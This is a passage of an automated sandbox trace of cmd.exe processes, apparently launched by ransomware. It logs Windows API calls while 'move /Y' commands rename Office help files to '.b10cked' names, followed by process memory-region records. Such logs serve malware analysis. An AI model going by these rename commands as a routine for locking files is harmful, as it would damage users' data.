phkResult=0x14e894 | out: phkResult=0x14e894*=0x40) returned 0x0 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0x40, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x1, lpcbData=0x14e898*=0x4) returned 0x0 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0x1, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x0, lpcbData=0x14e898*=0x4) returned 0x0 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x9, lpcbData=0x14e898*=0x4) returned 0x0 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x9, lpcbData=0x14e898*=0x4) returned 0x0 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0x9, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.744] RegCloseKey (hKey=0x40) returned 0x0 [0201.744] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.744] srand (_Seed=0x5b8863a3) [0201.744] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked\"" [0201.744] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked\"" [0201.744] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.745] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.745] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.745] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.745] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.745] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.745] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.745] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.745] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.745] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.745] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.745] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.745] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.745] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.745] GetEnvironmentStringsW () returned 0x1a22d8* [0201.745] FreeEnvironmentStringsW (penv=0x1a22d8) returned 1 [0201.745] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.745] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.745] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.746] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.746] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.746] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.746] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.746] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.746] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.746] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.746] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f660 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.746] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f660, lpFilePart=0x14f65c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f65c*="Desktop") returned 0x18 [0201.746] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.746] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f3dc | out: lpFindFileData=0x14f3dc) returned 0x1a0018 [0201.746] FindClose (in: hFindFile=0x1a0018 | out: hFindFile=0x1a0018) returned 1 [0201.746] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f3dc | out: lpFindFileData=0x14f3dc) returned 0x1a0018 [0201.746] FindClose (in: hFindFile=0x1a0018 | out: hFindFile=0x1a0018) returned 1 [0201.747] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f3dc | out: lpFindFileData=0x14f3dc) returned 0x1a0018 [0201.747] FindClose (in: hFindFile=0x1a0018 | out: hFindFile=0x1a0018) returned 1 [0201.747] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.747] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.747] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.747] GetEnvironmentStringsW () returned 0x1a2af8* [0201.747] FreeEnvironmentStringsW (penv=0x1a2af8) returned 1 [0201.747] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.748] GetConsoleOutputCP () returned 0x1b5 [0201.757] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.757] GetUserDefaultLCID () returned 0x409 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f7a0, cchData=128 | out: lpLCData="0") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f7a0, cchData=128 | out: lpLCData="0") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f7a0, cchData=128 | out: lpLCData="1") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.762] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.763] GetConsoleTitleW (in: lpConsoleTitle=0x1908e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.778] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.778] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.778] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.778] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.778] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.779] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.779] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.779] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.779] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.779] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.779] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.781] GetConsoleTitleW (in: lpConsoleTitle=0x14f498, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.814] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.814] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.814] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.814] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.814] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.814] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.814] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.814] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.814] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.814] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.814] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.814] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.814] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.814] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.814] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.814] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.814] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.814] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.814] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.814] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.814] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.814] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.814] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.814] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.814] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.814] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.814] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.814] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.814] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.814] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.814] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.814] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.814] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.814] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.814] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.816] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.816] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.816] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f254, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f24c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f24c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.816] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.817] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.817] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.817] _wcsicmp (_String1="MSMSAC~1.HXN", _String2=".") returned 63 [0201.817] _wcsicmp (_String1="MSMSAC~1.HXN", _String2="..") returned 63 [0201.817] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsac~1.hxn")) returned 0x2022 [0201.818] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1a1e48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.818] SetErrorMode (uMode=0x0) returned 0x0 [0201.818] SetErrorMode (uMode=0x1) returned 0x0 [0201.818] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", nBufferLength=0x104, lpBuffer=0x14ebdc, lpFilePart=0x14ebc4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", lpFilePart=0x14ebc4*="MSMSAC~1.HXN") returned 0x27 [0201.818] SetErrorMode (uMode=0x0) returned 0x1 [0201.818] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.818] _wcsicmp (_String1="MSMSAC~1.HXN", _String2=".") returned 63 [0201.818] _wcsicmp (_String1="MSMSAC~1.HXN", _String2="..") returned 63 [0201.818] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsac~1.hxn")) returned 0x2022 [0201.818] SetErrorMode (uMode=0x0) returned 0x0 [0201.818] SetErrorMode (uMode=0x1) returned 0x0 [0201.818] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", nBufferLength=0x104, lpBuffer=0x14f058, lpFilePart=0x14edf0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", lpFilePart=0x14edf0*="MSMSAC~1.HXN") returned 0x27 [0201.818] SetErrorMode (uMode=0x0) returned 0x1 [0201.818] SetErrorMode (uMode=0x0) returned 0x0 [0201.818] SetErrorMode (uMode=0x1) returned 0x0 [0201.818] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x14f260, lpFilePart=0x14edf0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked", lpFilePart=0x14edf0*="MS.MSACCESS.14.1033.hxn.b10cked") returned 0x3a [0201.818] SetErrorMode (uMode=0x0) returned 0x1 [0201.818] SetLastError (dwErrCode=0x0) [0201.818] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.msaccess.14.1033.hxn.b10cked")) returned 0xffffffff [0201.818] GetLastError () returned 0x2 [0201.818] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x14e76c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e76c) returned 0x190e78 [0201.819] FindNextFileW (in: hFindFile=0x190e78, lpFindFileData=0x14e76c | out: lpFindFileData=0x14e76c) returned 0 [0201.819] FindClose (in: hFindFile=0x190e78 | out: hFindFile=0x190e78) returned 1 [0201.819] GetLastError () returned 0x12 [0201.819] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x14e76c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e76c) returned 0x190e78 [0201.820] FindNextFileW (in: hFindFile=0x190e78, lpFindFileData=0x14e76c | out: lpFindFileData=0x14e76c) returned 0 [0201.820] FindClose (in: hFindFile=0x190e78 | out: hFindFile=0x190e78) returned 1 [0201.820] GetLastError () returned 0x12 [0201.820] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1a1be8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a1be8) returned 0x190e78 [0201.821] FindNextFileW (in: hFindFile=0x190e78, lpFindFileData=0x1a1be8 | out: lpFindFileData=0x1a1be8) returned 0 [0201.821] FindClose (in: hFindFile=0x190e78 | out: hFindFile=0x190e78) returned 1 [0201.821] GetLastError () returned 0x12 [0201.821] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1a1be8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a1be8) returned 0x190e78 [0201.821] FindNextFileW (in: hFindFile=0x190e78, lpFindFileData=0x1a1be8 | out: lpFindFileData=0x1a1be8) returned 0 [0201.821] FindClose (in: hFindFile=0x190e78 | out: hFindFile=0x190e78) returned 1 [0201.821] GetLastError () returned 0x12 [0201.821] _get_osfhandle (_FileHandle=2) returned 0xb [0201.821] GetFileType (hFile=0xb) returned 0x2 [0201.933] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.933] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14e93c | out: lpMode=0x14e93c) returned 1 [0201.933] _get_osfhandle (_FileHandle=2) returned 0xb [0201.933] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14e970 | out: lpConsoleScreenBufferInfo=0x14e970) returned 1 [0201.933] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.934] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14e9b0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.934] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x14e994, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14e994*=0x2c) returned 1 [0201.935] longjmp () [0201.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.935] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.935] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.935] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.935] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.935] SetConsoleInputExeNameW () returned 0x1 [0201.935] GetConsoleOutputCP () returned 0x1b5 [0201.935] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.935] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.936] exit (_Code=1) Process: id = "465" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xd1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29236 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29237 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29238 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29239 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 29240 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29241 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29242 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29243 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29244 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29245 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29734 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29735 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29736 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29737 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 29738 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 29739 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29740 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29741 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29742 start_va = 